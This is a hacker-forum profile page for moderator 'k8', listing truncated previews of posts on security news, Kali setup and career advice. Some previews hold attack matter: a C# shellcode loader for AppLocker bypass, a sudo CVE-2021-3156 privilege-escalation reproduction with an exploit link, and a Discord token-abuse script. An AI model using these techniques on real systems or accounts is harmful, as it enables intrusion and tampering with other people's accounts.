Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

k8

Moderators
  • Content Count

    59
  • Joined

  • Last visited

  • Days Won

    2
  • Donations

    $0.00 

k8 last won the day on March 21

k8 had the most liked content!

Community Reputation

5 Neutral

6 Followers

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. 手机恢复出厂设置就可以了。如果是HID卡监听,建议换张手机卡,都换了的话 在没有连接外部网络的情况下 还是会出现情况 ,那就是你自己神经不正常。
  2. 多多关注论坛就可以共同学习啦~
  3. 一、下载系统镜像文件 1.首先下载系统镜像,进入kali官网,在Downloads中选择Download Kali Linux,如下图所示。 2.根据电脑配置选择合适的版本,在这里我选择的是64位版本,点击HTTP下载镜像文件。 二、创建新的虚拟机 1.打开VMware Workstation,创建新的虚拟机,我们使用自定义的配置方法。 2.导入系统镜像文件。 3.选择客户机操作系统及版本。 4.输入虚拟机的名称和安装位置。 5.点击下一步直至出现以下界面。为虚拟机分配内存,建议不要超过提示的最大推荐内存,这里分配2GB。 6.继续点击下一步,
  4. Researchers have demonstrated a novel class of attacks that could allow a bad actor to potentially circumvent existing countermeasures and break the integrity protection of digitally signed PDF documents. Called "Shadow attacks" by academics from Ruhr-University Bochum, the technique uses the "enormous flexibility provided by the PDF specification so that shadow documents remain standard-compliant." The findings were presented yesterday at the Network and Distributed System Security Symposium (NDSS), with 16 of the 29 PDF viewers tested — including Adobe Acrobat, Foxit Reader, Perfec
  5. Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546. The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang. But in a twist, no ransomware was
  6. An ever-evolving and rampant form of cybercrime that targets emails as the potential medium to conduct fraud is known as Business Email Compromise. Targeting commercial, government as well as non-profit organizations, BEC can lead to huge amounts of data loss, security breach, and compromised financial assets. It is a common misconception that cybercriminals usually lay their focus on MNCs and enterprise-level organizations. SMEs these days are just as much a target to email fraud as the larger industry players. How Can BEC Affect Organizations? Examp
  7. Days after the first malware targeting Apple M1 chips was discovered in the wild, researchers have disclosed yet another previously undetected piece of malicious software that was found in about 30,000 Macs running Intel x86_64 and the iPhone maker's M1 processors. However, the ultimate goal of the operation remains something of a conundrum, what with the lack of a next-stage or final payload leaving researchers unsure of its distribution timeline and whether the threat is just under active development. Calling the malware "Silver Sparrow," cybersecurity firm Red Canary said it
  8. Brave has fixed a privacy issue in its browser that sent queries for .onion domains to public internet DNS resolvers rather than routing them through Tor nodes, thus exposing users' visits to dark web websites. The bug was addressed in a hotfix release (V1.20.108) made available yesterday. Brave ships with a built-in feature called "Private Window with Tor" that integrates the Tor anonymity network into the browser, allowing users to access .onion websites, which are hosted on the darknet, without revealing the IP address information to internet service providers (ISPs), Wi-Fi networ
  9. 前言 分析昨天的vbs的时候看见了个为[Reflection.Assembly]::Load的技术。好像没研究过 就拿来研究一下。 简要说明:利用powershell进行C#里的函数调用 参考链接:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8Assembly-Load-&-LoadFile%E7%BB%95%E8%BF%87Applocker%E7%9A%84%E5%88%86%E6%9E%90%E6%80%BB%E7%BB%93/ 复现过程 注意实现,被调用的类名和函数名。须为public。且为静态(static) test.cs using System; using System.Runtime.InteropServices; namespace run { public class Program { public static void box() { byte[] shellcode = new byte[304]{ 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14
  10. 影响版本 Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1 sudo官方位于1月26号已经修复,后面在安装的sudo已经补上了 官方链接:https://www.sudo.ws/ 不影响的版本 sudo =>1.9.5p2 exp:https://github.com/422926799/note/tree/master/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/CVE-2021-3156 来源于某微信公众号:https://mp.weixin.qq.com/s/c9UiJ74TbLXziK08tumIHA 环境 Debain Sudo version 1.8.31p1 Ubuntu Sudo version 1.8.21p2 (昨天安的sudo已经修复) 复现过程 检测是否存在漏洞 sudoedit -s / 1 存在 不存在 下载exp,make。然后运行sudo-hax-me-a-sandwich
  11. 由于我之前写了不少网络安全技术相关的故事文章,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人在微信里问我: 我刚入门网络安全,该怎么学?要学哪些东西?有哪些方向?怎么选? 不同于Java、C/C++等后端开发岗位有非常明晰的学习路线,网路安全更多是靠自己摸索,要学的东西又杂又多,难成体系。 常读我文章的朋友知道,我的文章基本以故事为载体的技术输出为主,很少去谈到职场、面试这些方面的内容。主要是考虑到现在大家的压力已经很大,节奏很快,公众号上是让大家放松的地方,尽量写一些轻快的内容。不过随着越来越多的人问我上面这些问题,今天就专门写一篇来摆一摆这个龙门阵。 近几年,随着网络安全被列为国家安全战略的一部分,这个曾经细分的领域发展提速了不少,除了一些传统安全厂商以外,一些互联网大厂也都纷纷加码了在这一块的投入,随之而来的吸引了越来越多的新鲜血液不断涌入。 网络安全分支 其实在网络安全这个概念之上,还有一个更大的概念:信息安全。本文不去探讨二者在学术划分上的区别,如无特殊说明,文中将其视为一个概念,我们来看下实际工作方向上,有哪些细分路线。 在这个圈子技术门类中,工作岗位主要有以下三个方向:
  12. Unverify E-mail Description This simple exploit gives you the ability to unverify e-mail addresses linked to any Discord account through it's authorization token Original founder fweak Usage $ py example.py <token> import requests import sys class Exploit: def __init__(self, token, channel): self.token = token self.channel_id = channel self.headers = {'Authorization': token} def execute(self): """ unverify e-mail """ return requests.get('https://discord.com/api/v6/guilds/0/members', headers=self.

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines